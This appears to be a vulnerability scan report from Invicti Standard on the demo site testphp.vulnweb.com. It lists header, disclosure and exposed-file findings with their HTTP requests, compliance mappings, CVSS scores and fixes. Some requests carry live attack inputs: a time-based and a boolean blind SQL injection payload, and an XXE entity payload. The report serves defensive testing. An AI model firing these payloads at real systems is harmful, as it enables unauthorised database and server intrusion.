Invicti Standard detected that the target web application reflected a piece of content starting from the first byte of the response. This might cause security issues such as Rosetta Stone Attack.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | p | Querystring | N3tSp4rK3R |
GET | pp | Querystring | 12 |
GET | aaaa%2f | Querystring | |
GET /hpp/params.php?aaaa%2f=&p=N3tSp4rK3R&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
A Content-Disposition header with a filename attribute can be returned to mitigate a possible attack:
Content-Disposition: attachment; filename=f.txt
Invicti Standard identified a Possible Internal IP Address Disclosure in the page.
It was not determined if the IP address was that of the system itself or that of an internal network.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | URI-BASED | FullUrl | phpinfo.php |
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified possible phishing by navigating browser tabs but was unable to confirm the vulnerability.
Windows opened from normal hrefs with the target="_blank" attribute can modify window.opener.location and replace the parent web page with something else, even on a different origin.
While this vulnerability doesn't allow script execution, it does allow phishing attacks that silently replace the parent tab. If the links lack the rel="noopener noreferrer" attribute, a third-party site can change the URL of the source tab using window.opener.location.assign and trick users into thinking that they're still on a trusted page, leading them to enter their sensitive data on the malicious website.
GET /disclaimer.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Add rel=noopener to the links to prevent pages from abusing window.opener. This ensures that the page cannot access the window.opener property in Chrome and Opera browsers. rel=noreferrer additionally disables the Referer header.
<a href="..." target="_blank" rel="noopener noreferrer">...</a>
Invicti Standard identified a cookie not marked as HTTPOnly.
HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.
GET /AJAX/ HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified a database error message disclosure.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | test | Querystring | ' WAITFOR DELAY '0:0:25'-- /* 4ba992a8-9bcd-4b9a-bbee-8b7a829e2e38 */ |
GET /search.php?test=%27%20WAITFOR%20DELAY%20%270%3a0%3a25%27--%20%2f*%204ba992a8-9bcd-4b9a-bbee-8b7a829e2e38%20*%2f HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
PCI DSS v3.2 | 6.5.5 |
---|---|
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A5 |
OWASP 2017 | A6 |
CWE | 210 |
CAPEC | 118 |
WASC | 13 |
HIPAA | 164.306(a) , 164.308(a) |
ASVS 4.0 | 12.5.1 |
NIST SP 800-53 | SI-11 |
DISA STIG | V-6166 |
OWASP API Top Ten 2019 | API7 |
ISO27001 | A.18.1.3 |
ISO27001 2022 | A.8.15 |
ISO27001 2022 | A.8.9 |
OWASP Top Ten 2021 | A05 |
OWASP API Top 10 2023 | API8 |
Invicti Standard detected a missing X-Content-Type-Options header, which means that this website could be at risk of MIME-sniffing attacks.
MIME type sniffing is a standard functionality in browsers to find an appropriate way to render data where the HTTP headers sent by the server are either inconclusive or missing.
This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the intended one.
The problem arises once a website allows users to upload content which is then published on the web server. If an attacker can carry out an XSS (Cross-site Scripting) attack by manipulating the content in a way that is accepted by the web application and rendered as HTML by the browser, it is possible to inject code into e.g. an image file and make the victim execute it by viewing the image.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Add the X-Content-Type-Options header with a value of "nosniff" to inform the browser to trust what the site has sent is the appropriate content-type, and to not attempt "sniffing" the real content-type.
X-Content-Type-Options: nosniff
Invicti Standard identified a phpinfo() output.
phpinfo() is a debug functionality that prints out detailed information on both the system and the PHP configuration.
An attacker can obtain information such as:
This information can help an attacker gain a better understanding of the system. After gaining detailed information, the attacker can research known vulnerabilities for the system under review, and can also use this information during the exploitation of other vulnerabilities.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | URI-BASED | FullUrl | phpinfo.php |
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified a version disclosure (Nginx) in the target web server's HTTP response.
This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Nginx.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Configure your web server to prevent information leakage from the SERVER header of its HTTP response:
server_tokens off
Invicti Standard identified a version disclosure (PHP) in the target web server's HTTP response.
This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
CSP is an added layer of security that helps to mitigate mainly Cross-site Scripting attacks.
CSP can be enabled instructing the browser with a Content-Security-Policy directive in a response header;
Content-Security-Policy: script-src 'self';
or in a meta tag;
<meta http-equiv="Content-Security-Policy" content="script-src 'self';">
In the above example, you can restrict script loading only to the same domain. It will also restrict inline script executions both in the element attributes and the event handlers. There are various directives which you can use by declaring CSP:
When setting the CSP directives, you can also use some CSP keywords:
In addition to CSP keywords, you can also use a wildcard or only a scheme when defining whitelisted URLs for the directives. A wildcard can be used for the subdomain and port portions of the URLs:
Content-Security-Policy: script-src https://*.example.com;
Content-Security-Policy: script-src https://example.com:*;
Content-Security-Policy: script-src https:;
It is also possible to set a CSP in Report-Only mode instead of enforcing it immediately during the migration period. This way you can see violations of the CSP policy in the current state of your web site while migrating to CSP:
Content-Security-Policy-Report-Only: script-src 'self'; report-uri https://example.com;
There is no direct impact of not implementing CSP on your website. However, if your website is vulnerable to a Cross-site Scripting attack CSP can prevent successful exploitation of that vulnerability. By not implementing CSP you’ll be missing out on this extra layer of security.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Enable CSP on your website by sending the Content-Security-Policy header in HTTP responses, which instructs the browser to apply the policies you specified.
Invicti Standard detected that no Referrer-Policy header is implemented.
Referrer-Policy is a security header designed to prevent cross-domain Referer leakage.
The Referer header is a request header that indicates the site from which the traffic originated. If there is no adequate prevention in place, the URL itself, and even sensitive information contained in the URL, will be leaked to the cross-origin site.
The lack of a Referrer-Policy header might affect the privacy of the users and of the site itself.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
In a response header:
Referrer-Policy: no-referrer | same-origin | origin | strict-origin | no-referrer-when-downgrade
In a META tag:
<meta name="referrer" content="no-referrer | same-origin"/>
In an element attribute:
<a href="http://crosssite.example.com" rel="noreferrer"></a>
or
<a href="http://crosssite.example.com" referrerpolicy="no-referrer | same-origin | origin | strict-origin | no-referrer-when-downgrade"></a>
Please implement a Referrer-Policy by using the Referrer-Policy response header or by declaring it in the meta tags. It's also possible to control referrer information for an individual HTML element by using the rel or referrerpolicy attribute.
Cookies are typically sent to third parties in cross-origin requests. This can be abused to carry out CSRF attacks. Recently, a new cookie attribute named SameSite was proposed to disable third-party usage for some cookies, in order to prevent CSRF attacks.
Same-site cookies allow servers to mitigate the risk of CSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.
GET /AJAX/ HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
The server can set a same-site cookie by adding the SameSite=... attribute to the Set-Cookie header. There are three possible values for the SameSite attribute:
Set-Cookie: key=value; SameSite=Lax
Set-Cookie: key=value; SameSite=Strict
SameSite=None cookies must also specify the Secure attribute so that they are only transferred in a secure context. Setting a SameSite=None cookie without the Secure attribute will be rejected by browsers.
Set-Cookie: key=value; SameSite=None; Secure
Invicti Standard detected an exposed .htaccess file.
.htaccess files are configuration files for the Apache web server that can be used to override certain server configuration options on a per-directory basis using a human readable file.
If their contents are exposed, attackers can gain valuable insight into your server configuration and may read sensitive data that can aid them in further attacks.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | URI-BASED | FullUrl | .htaccess |
GET /Mod_Rewrite_Shop/.htaccess HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
OWASP 2013 | A5 |
---|---|
OWASP 2017 | A6 |
CWE | 16 |
ASVS 4.0 | 14.1.3 |
NIST SP 800-53 | AC-22 |
DISA STIG | V-16814 |
OWASP API Top Ten 2019 | API7 |
ISO27001 2022 | A.8.9 |
OWASP Top Ten 2021 | A05 |
OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.3 (Medium) |
Environmental | 5.3 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.3 (Medium) |
Environmental | 5.3 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
Invicti Standard identified a login page on the target website.
This issue is reported as additional information only. There is no direct impact arising from this issue.
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
OWASP Proactive Controls | C6 |
---|---|
Invicti Standard detected a possible SQL file.
GET /admin/create.sql HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/admin/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
PCI DSS v3.2 | 6.5.8 |
---|---|
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A7 |
OWASP 2017 | A5 |
CWE | 425 |
CAPEC | 87 |
WASC | 34 |
HIPAA | 164.306(a) , 164.308(a) |
ASVS 4.0 | 12.5.1 |
NIST SP 800-53 | AC-22 |
DISA STIG | V-16814 |
OWASP Proactive Controls | C7 |
ISO27001 | A.18.1.3 |
ISO27001 2022 | A.8.3 |
OWASP Top Ten 2021 | A01 |
OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
---|---|
Base | 5.8 (Medium) |
Temporal | 5.8 (Medium) |
Environmental | 5.8 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 5.8 (Medium) |
Temporal | 5.8 (Medium) |
Environmental | 5.8 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
Invicti Standard detected that autocomplete is enabled in one or more of the password fields.
If the user chooses to save them, data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used on shared computers, such as in cyber cafes or airport terminals.
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Add autocomplete="off" to the form tag or to individual "input" fields. However, since early 2014, major browsers do not respect this instruction, due to their integrated password management mechanisms, and offer to store the password internally.
OWASP 2013 | A5 |
---|---|
OWASP 2017 | A6 |
CWE | 16 |
WASC | 15 |
ASVS 4.0 | 2.10.3 |
NIST SP 800-53 | CM-6 |
DISA STIG | V-16786 |
ISO27001 | A.14.1.2 |
ISO27001 2022 | A.8.3 |
OWASP Top Ten 2021 | A05 |
CVSS 3.0 SCORE | |
---|---|
Base | 4.6 (Medium) |
Temporal | 4.6 (Medium) |
Environmental | 4.6 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 4.6 (Medium) |
Temporal | 4.6 (Medium) |
Environmental | 4.6 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Invicti Standard detected the target website is using MySQL as its backend database.
This is generally not a security issue and is reported here for informational purposes only.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | cat | Querystring | -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT 0x4E4554535041524B4552),9,1)),0)=82-- |
GET /listproducts.php?cat=-1%20OR%201%3d1%20AND%20IFNULL(ASCII(SUBSTRING((SELECT%200x4E4554535041524B4552)%2c9%2c1))%2c0)%3d82--%20 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
OWASP 2017 | A6 |
---|---|
CWE | 205 |
WASC | 13 |
ASVS 4.0 | 14.3.3 |
NIST SP 800-53 | AC-22 |
DISA STIG | V-16814 |
OWASP API Top Ten 2019 | API7 |
ISO27001 | A.14.2.5 |
ISO27001 2022 | A.8.27 |
OWASP Top Ten 2021 | A05 |
OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
---|---|
Base | 4 (Medium) |
Temporal | 4 (Medium) |
Environmental | 4 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 4 (Medium) |
Temporal | 4 (Medium) |
Environmental | 4 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N |
Invicti Standard identified an Email Address Disclosure.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
CWE | 200 |
---|---|
CAPEC | 118 |
WASC | 13 |
ASVS 4.0 | 14.3.3 |
NIST SP 800-53 | AC-22 |
DISA STIG | V-16814 |
OWASP Proactive Controls | C7 |
ISO27001 | A.9.4.1 |
ISO27001 2022 | A.8.3 |
CVSS 3.0 SCORE | |
---|---|
Base | 0 (None) |
Temporal | 0 (None) |
Environmental | 0 (None) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 0 (None) |
Temporal | 0 (None) |
Environmental | 0 (None) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N |
Invicti Standard identified a forbidden resource.
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for informational purposes.
POST /images/ HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 124
Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>
Invicti Standard identified a web server (Nginx) in the target web server's HTTP response.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
OWASP 2017 | A6 |
---|---|
CWE | 205 |
WASC | 13 |
ASVS 4.0 | 14.3.3 |
NIST SP 800-53 | AC-22 |
DISA STIG | V-16814 |
OWASP API Top Ten 2019 | API7 |
OWASP Proactive Controls | C7 |
ISO27001 | A.14.2.5 |
OWASP Top Ten 2021 | A05 |
OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.1 (Medium) |
Environmental | 5.1 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C |
CVSS 3.1 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.1 (Medium) |
Environmental | 5.1 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C |
Invicti Standard identified PHP in the target web server's HTTP response.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
OWASP 2017 | A6 |
---|---|
CWE | 205 |
WASC | 13 |
ASVS 4.0 | 14.3.3 |
NIST SP 800-53 | AC-22 |
DISA STIG | V-16814 |
OWASP API Top Ten 2019 | API7 |
OWASP Proactive Controls | C7 |
ISO27001 | A.14.2.5 |
OWASP Top Ten 2021 | A05 |
OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.1 (Medium) |
Environmental | 5.1 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C |
CVSS 3.1 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.1 (Medium) |
Environmental | 5.1 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C |
Invicti Standard identified an unexpected redirect response body (too large).
This generally indicates that, after issuing the redirect, the page did not terminate the response as it should have.
GET /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Use Response.Redirect("redirected-page.aspx", true) instead of Response.Redirect("redirected-page.aspx", false).
Call exit() after you redirect the user.
Enabled Security Checks | : | Apache Struts S2-045 RCE, Apache Struts S2-046 RCE, BREACH Attack, Code Evaluation, Code Evaluation (Out of Band), Command Injection, Command Injection (Blind), Content Security Policy, Content-Type Sniffing, Cookie, Cross-Origin Resource Sharing (CORS), Cross-Site Request Forgery, Cross-site Scripting, Cross-site Scripting (Blind), Custom Script Checks (Active), Custom Script Checks (Passive), Custom Script Checks (Per Directory), Custom Script Checks (Singular), Drupal Remote Code Execution, Expression Language Injection, File Upload, GraphQL Library Detection, Header Analyzer, HSTS, HTML Content, HTTP Header Injection, HTTP Methods, HTTP Status, HTTP.sys (CVE-2015-1635), IFrame Security, Insecure JSONP Endpoint, Insecure Reflected Content, JavaScript Libraries, JSON Web Token, Local File Inclusion, Log4j Code Evaluation (Out of Band), Login Page Identifier, Malware Analyzer, Mixed Content, MongoDB Injection (Blind), MongoDB Injection (Boolean), MongoDB Injection (Error Based), MongoDB Injection (Operator), Open Redirection, Oracle WebLogic Remote Code Execution, Referrer Policy, Reflected File Download, Remote File Inclusion, Remote File Inclusion (Out of Band), Reverse Proxy Detection, RoR Code Execution, Security Assertion Markup Language (SAML), Sensitive Data, Server-Side Request Forgery (DNS), Server-Side Request Forgery (Pattern Based), Server-Side Template Injection, Signatures, Software Composition Analysis (SCA), Spring4Shell Remote Code Execution, SQL Injection (Blind), SQL Injection (Boolean), SQL Injection (Error Based), SQL Injection (Out of Band), SSL, Static Resources (All Paths), Static Resources (Only Root Path), Unicode Transformation (Best-Fit Mapping), WAF Identifier, Web App Fingerprint, Web Cache Deception, WebDAV, Windows Short Filename, Wordpress Plugin Detection, Wordpress Theme Detection, XML External Entity, XML External Entity (Out of Band) |
---|---|---|
URL Rewrite Mode | : | Heuristic |
Detected URL Rewrite Rule(s) | : | None |
Excluded URL Patterns | : | gtm\.js WebResource\.axd ScriptResource\.axd |
Authentication | : | None |
Authentication Profile | : | None |
Scheduled | : | No |
Additional Website(s) | : | None |